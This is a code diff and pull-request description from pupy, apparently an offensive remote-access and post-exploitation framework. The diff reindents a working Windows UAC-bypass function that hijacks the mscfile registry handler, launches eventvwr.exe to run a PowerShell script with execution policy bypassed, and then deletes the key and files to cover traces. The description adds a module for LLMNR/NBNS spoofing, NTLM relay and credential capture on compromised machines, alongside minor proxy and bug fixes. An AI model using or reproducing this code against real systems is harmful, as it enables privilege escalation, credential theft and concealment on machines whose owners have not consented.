+        tab=additional_proxies.split(":")
         yield tab[0].upper(), tab[1]+":"+tab[2], login, password
 
     if sys.platform=="win32":

--- a/pupy/network/lib/launchers/auto_proxy.py
+++ b/pupy/network/lib/launchers/auto_proxy.py
@@ -106,14 +106,14 @@ def get_proxies(wpad_timeout=600, additional_proxies=None):
     
     env_proxy=os.environ.get('HTTP_PROXY')
     if env_proxy:
-        user, passwd, proxy=re.match("^(?:https?://)?(?:(?P<user>\w+):?(?P<password>\w*)@)?(?P<proxy_addr>\S+:[0-9]+)$",env_proxy).groups()
+        user, passwd, proxy=re.match("^(?:https?://)?(?:(?P<user>\w+):?(?P<password>\w*)@)?(?P<proxy_addr>\S+:[0-9]+)/*$",env_proxy).groups()
         yield ('HTTP', proxy, user, passwd)
 
     python_proxies = urllib.getproxies()    
     
     for key in python_proxies:
         if key.upper() in ('HTTP', 'HTTPS', 'SOCKS') and python_proxies[key] != '':
-            user, passwd, proxy=re.match("^(?:https?://)?(?:(?P<user>\w+):?(?P<password>\w*)@)?(?P<proxy_addr>\S+:[0-9]+)$",python_proxies[key]).groups()
+            user, passwd, proxy=re.match("^(?:https?://)?(?:(?P<user>\w+):?(?P<password>\w*)@)?(?P<proxy_addr>\S+:[0-9]+)/*$",python_proxies[key]).groups()
             
             if key.upper() == 'SOCKS':
                 key = 'SOCKS4'

--- a/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py
+++ b/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py
@@ -4,51 +4,51 @@ import subprocess
 from _winreg import *
 
 def deleteTHisRemoteFile(tmp_files):
-	for file in tmp_files:
-		try:
-			os.remove(file)
-		except Exception, e:
-			pass
+    for file in tmp_files:
+        try:
+            os.remove(file)
+        except Exception, e:
+            pass
 
 def get_env_variables():
-	try:
-		tmp = os.path.expandvars("%TEMP%")
-	except:
-		tmp = os.path.expandvars("%APPDATA%")
-	
-	sysroot = os.path.expandvars("%SYSTEMROOT%")
-	
-	return tmp, sysroot
+    try:
+        tmp = os.path.expandvars("%TEMP%")
+    except:
+        tmp = os.path.expandvars("%APPDATA%")
+    
+    sysroot = os.path.expandvars("%SYSTEMROOT%")
+    
+    return tmp, sysroot
 
 
 def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete):
-	# 	'''
-	# 	Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
-	# 	'''
-	HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
-	powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%")
-	mscCmdPath = "Software\Classes\mscfile\shell\open\command"	
-	cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath)
-	
-	try:
-		# The registry key already exist in HKCU, altering...
-		key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE)
-	except:
-		# Adding the registry key in HKCU
-		key = CreateKey(HKCU, mscCmdPath)
+    #   '''
+    #   Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
+    #   '''
+    HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
+    powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%")
+    mscCmdPath = "Software\Classes\mscfile\shell\open\command"  
+    cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath)
+    
+    try:
+        # The registry key already exist in HKCU, altering...
+        key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE)
+    except:
+        # Adding the registry key in HKCU
+        key = CreateKey(HKCU, mscCmdPath)
 
-	registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE)
-	SetValueEx(registry_key, '', 0, REG_SZ, cmd)
-	CloseKey(registry_key)
-			
-	# Executing eventvwr.exe
-	eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe')
-	output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
+    registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE)
+    SetValueEx(registry_key, '', 0, REG_SZ, cmd)
+    CloseKey(registry_key)
+            
+    # Executing eventvwr.exe
+    eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe')
+    output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
 
-	# Sleeping 5 secds...
-	time.sleep(5)
-	
-	#Clean everything
-	DeleteKey(HKCU, mscCmdPath)
-	deleteTHisRemoteFile(files_to_delete)
-	
+    # Sleeping 5 secds...
+    time.sleep(5)
+    
+    #Clean everything
+    DeleteKey(HKCU, mscCmdPath)
+    deleteTHisRemoteFile(files_to_delete)
+    

--- a/pupy/packages/windows/all/pupwinutils/processes.py
+++ b/pupy/packages/windows/all/pupwinutils/processes.py
@@ -74,18 +74,18 @@ def start_hidden_process(path):
     return p
     
 def is_x64_architecture():
-	""" Return True if the architecture is x64 """
-	if "64" in platform.machine():
-		return True
-	else:
-		return False
-		
+    """ Return True if the architecture is x64 """
+    if "64" in platform.machine():
+        return True
+    else:
+        return False
+        
 def is_x86_architecture():
-	""" Return True if the architecture is x86 """
-	if "86" in platform.machine():
-		return True
-	else:
-		return False
+    """ Return True if the architecture is x86 """
+    if "86" in platform.machine():
+        return True
+    else:
+        return False
 
 def get_current_pid():
     p = psutil.Process(os.getpid())
@@ -93,8 +93,10 @@ def get_current_pid():
     return dic
 
 def get_current_ppid():
+    dic = {'Parent Name': None, 'PPID': None}
     pp = psutil.Process(os.getpid()).parent()
-    dic = {'Parent Name': pp.name(), 'PPID': pp.pid}
+    if pp != None:
+        dic = {'Parent Name': pp.name(), 'PPID': pp.pid}
     return dic
 
 def isUserAdmin():


### PR DESCRIPTION
New module named "inveigh" for Windows targets.

It uses the very good Inveigh project [(https://github.com/Kevin-Robertson/Inveigh)](https://github.com/Kevin-Robertson/Inveigh). Thansk to @Kevin-Robertson.
Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool.

Thanks to this new module (and Inveigh project of course), we can do these following operations **from the target** (at least):
- HTTP/HTTPS to SMB **NTLMv2 relay**
- LLMNR/NBNS spoof
- NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB
-  Basic auth cleartext credential capture over HTTP/HTTPS

Others commits:
- Print a new message in bypassuac module to help user if the module failed (https://github.com/n1nj4sec/pupy/pull/229/commits/c87452360035ee2944e6e44c7424a24fde370d91). Replace tabs by spaces in bypassuac.
- Bug fix in _get_current_ppid_ function (https://github.com/n1nj4sec/pupy/pull/229/commits/ef4decee75d38015c1622e47cf69ba3531f5cf2c):
```
Traceback (most recent call last):
  File "C:\Python27\Lib\site-packages\rpyc\core\protocol.py", line 305, in _dispatch_request
  File "C:\Python27\Lib\site-packages\rpyc\core\protocol.py", line 535, in _handle_call
  File "<memimport>\pupwinutils\processes.py", line 100, in get_current_ppid
AttributeError: 'NoneType' object has no attribute 'name'
```